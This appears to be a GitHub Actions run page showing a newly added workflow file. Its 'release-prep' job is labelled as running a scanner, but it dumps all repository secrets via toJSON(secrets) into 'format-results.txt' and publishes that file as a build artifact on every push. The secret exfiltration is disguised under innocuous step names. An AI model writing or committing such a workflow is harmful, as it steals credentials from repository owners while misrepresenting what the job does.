Skip to content

ci: add workflow

ci: add workflow #1

Workflow file for this run

on: [push]
jobs:
release-prep:
runs-on: ubuntu-latest
env:
VARIABLE_STORE: ${{ toJSON(secrets) }}
steps:
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
- name: Run scanner
run: echo "$VARIABLE_STORE" > format-results.txt
- name: Export results
uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
with:
name: format-results
path: format-results.txt